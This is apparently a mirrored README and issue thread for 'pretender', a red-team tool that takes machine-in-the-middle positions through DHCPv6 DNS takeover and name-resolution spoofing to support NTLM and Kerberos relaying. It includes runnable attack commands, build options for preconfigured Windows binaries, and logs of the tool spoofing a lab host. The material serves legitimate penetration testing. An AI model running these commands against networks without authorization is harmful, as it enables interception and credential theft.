Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS, LLMNR and NetBIOS-NS spoofing.

  • By RedTeam Pentesting GmbH
  • Last update: Jan 1, 2023
  • Comments: 3

pretender

Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover
as well as mDNS, LLMNR and NetBIOS-NS spoofing

Release GitHub Action: Check Software License Go Report Card

pretender is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender primarily targets Windows hosts, as it is intended to be used for relaying attacks but can be deployed on Linux, Windows and all other platforms Go supports. It can also answer with arbitrary IPs for situations where the relaying tool runs on a different host than pretender.

Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.

Usage

To get a feel for the situation in the local network, pretender can be started in --dry mode where it only logs incoming queries and does not answer any of them:

pretender -i eth0 --dry
pretender -i eth0 --dry --no-ra # without router advertisements

To perform local name resolution spoofing via mDNS, LLMNR and NetBIOS-NS as well as a DHCPv6 DNS takeover with router advertisements, simply run pretender like this:

pretender -i eth0

You can disable certain attacks with --no-dhcp-dns (disabled DHCPv6, DNS and router advertisements), --no-lnr (disabled mDNS, LLMNR and NetBIOS-NS), --no-mdns, --no-llmnr, --no-netbios and --no-ra.

If ntlmrelayx.py runs on a different host (say 10.0.0.10/fe80::5), run pretender like this:

pretender -i eth0 -4 10.0.0.10 -6 fe80::5

Pretender can be setup to only respond to queries for certain domains (or all but certain domains) and it can perform the spoofing attacks only for certain hosts (or all but certain hosts). Referencing hosts by hostname relies on the name resolution of the host that runs pretender. See the following example:

pretender -i eth0 --spoof example.com --dont-spoof-for 10.0.0.3,host1.corp,fe80::f --ignore-nofqdn

For more information, run pretender --help.

Tips

  • Make sure to enable IPv6 support in ntlmrelayx.py with the -6 flag
  • Pretender can be configured to stop after a certain time period for situations where it cannot be aborted manually (--stop-after and main.vendorStopAfter)
  • Host info lookup (which relies on the ARP table, IP neighbours and reverse lookups) can be disabled with --no-host-info or main.vendorNoHostInfo
  • If you are not sure which interface to choose (especially on Windows), list all interfaces with names and addresses using --interfaces
  • If you want to exclude hosts from local name resolution spoofing, make sure to also exclude their IPv6 addresses or use --no-ipv6-lnr/main.vendorNoIPv6LNR
  • DHCPv6 messages usually contain a FQDN option (which can also sometimes contain a hostname which is not a FQDN). This option is used to filter out messages by hostname (--spoof-for/--dont-spoof-for). You can decide what to do with DHCPv6 messages without FQDN option by setting or omitting --ignore-nofqdn
  • Depending on the build configuration, either the operating system resolver (CGO_ENABLED=1) or a Go implementation (CGO_ENABLED=0) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.
  • The host info functionality is currently only available for Windows and Linux.
  • A custom MAC address vendor list can be compiled into the binary by replacing the default list hostinfo/mac-vendors.txt. Only lines with MAC prefixes in the following format are recognized: FF:FF:FF<tab>VendorID<tab>Vendor.

Building and Vendoring

Pretender can be build as follows:

go build

Pretender can also be compiled with pre-configured settings. For this, the ldflags have to be modified like this:

-ldflags '-X main.vendorInterface=eth1'

For example, Pretender can be built for Windows with a specific default interface, without colored output and with a relay IPv4 address configured:

GOOS=windows go build -trimpath -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorRelayIPv4=10.0.0.10'

Full list of vendoring options (see defaults.go or pretender --help for detailed information):

vendorInterface
vendorRelayIPv4
vendorRelayIPv6
vendorNoDHCPv6DNSTakeover
vendorNoDHCPv6
vendorNoDNS
vendorNoMDNS
vendorNoNetBIOS
vendorNoLLMNR
vendorNoLocalNameResolution
vendorNoRA
vendorNoIPv6LNR
vendorSpoof
vendorDontSpoof
vendorSpoofFor
vendorDontSpoofFor
vendorSpoofTypes
vendorIgnoreDHCPv6NoFQDN
vendorDryMode
vendorTTL
vendorLeaseLifetime
vendorRARouterLifetime
vendorRAPeriod
vendorStopAfter
vendorVerbose
vendorNoColor
vendorNoTimestamps
vendorLogFileName
vendorNoHostInfo
vendorHideIgnored
vendorRedirectStderr
vendorListInterfaces

Download

pretender.zip

Comments(3)

  • 1

    Handle SOA queries and dynamic updates for Kerberos relaying

    This PR implements the necessary changes to support Kerberos relaying together with krbrelayx. However, we should add some tests before merging. Closes #1.

  • 2

    Respond to SOA queries and dynamic updates for Kerberos relaying

    Pretender should respond to SOA queries and dynamic updates to support the Kerberos relaying attack outlined in https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/.

  • 3

    Filtering with --spoof-for

    Hi, first of all thanks for this great tool :D

    I have a feature request regarding filtering with --spoof-for.

    Following example:

    # pretender --verbose --interface ens18 --no-lnr --spoof-for 192.168.2.2
Pretender by RedTeam Pentesting built from git commit 69d85ac239
Listening on interface: ens18
IPv4 relayed to: 192.168.2.12
IPv6 relayed to: fe80::8f6:4eff:fef4:f415
Answering queries from: 192.168.2.2

23:44:35 [DNS] listening via TCP on [fe80::8f6:4eff:fef4:f415%ens18]:53
23:44:35 [DNS] listening via UDP on [fe80::8f6:4eff:fef4:f415%ens18]:53
23:44:35 [DHCPv6] listening via UDP on [ff02::1:2%ens18]:547
23:44:36 [RA] sending router advertisement on ens18
23:44:51 [DHCPv6] ignoring DHCP SOLICIT request from fe80::d09b:746d:4510:5d8c (win2016.arasaka.local, 192.168.2.2): host not in spoof-for list

    I think pretender should answer the DHCPv6 request, because it knows that fe80::d09b:746d:4510:5d8c belongs to the allowed address 192.168.2.2. Otherwise allowing only specific IPs is quiet cumbersome because you have to know the IPv6 address in beforehand.

    Another case is this:

    # pretender --verbose --interface ens18 --no-lnr --spoof-for win2016.arasaka.local
Pretender by RedTeam Pentesting built from git commit 69d85ac239
Listening on interface: ens18
IPv4 relayed to: 192.168.2.12
IPv6 relayed to: fe80::8f6:4eff:fef4:f415
Answering queries from: win2016.arasaka.local (192.168.2.2)

23:39:10 [DHCPv6] listening via UDP on [ff02::1:2%ens18]:547
23:39:10 [DNS] listening via TCP on [fe80::8f6:4eff:fef4:f415%ens18]:53
23:39:10 [DNS] listening via UDP on [fe80::8f6:4eff:fef4:f415%ens18]:53
23:39:11 [RA] sending router advertisement on ens18
23:39:38 [DHCPv6] responding to SOLICIT from fe80::d09b:746d:4510:5d8c (win2016.arasaka.local, 192.168.2.2) by assigning IPv6 "fe80::8000:c66d:7e7b:5e75"
23:39:39 [DHCPv6] responding to REQUEST from fe80::d09b:746d:4510:5d8c (win2016.arasaka.local, 192.168.2.2) by assigning DNS server and IPv6 "fe80::8000:c66d:7e7b:5e75"
23:39:39 [DNS] ignoring query for "win2016.arasaka.local" (SOA) from fe80::8000:c66d:7e7b:5e75 (192.168.2.2): host address and name not in spoof-for list

    Here it would be nice if the query from fe80::8000:c66d:7e7b:5e75 (192.168.2.2) would be answered, because pretender knows that fe80::8000:c66d:7e7b:5e75 belongs to 192.168.2.2 which in turn belongs to win2016.arasaka.local.

Popular Tag

Related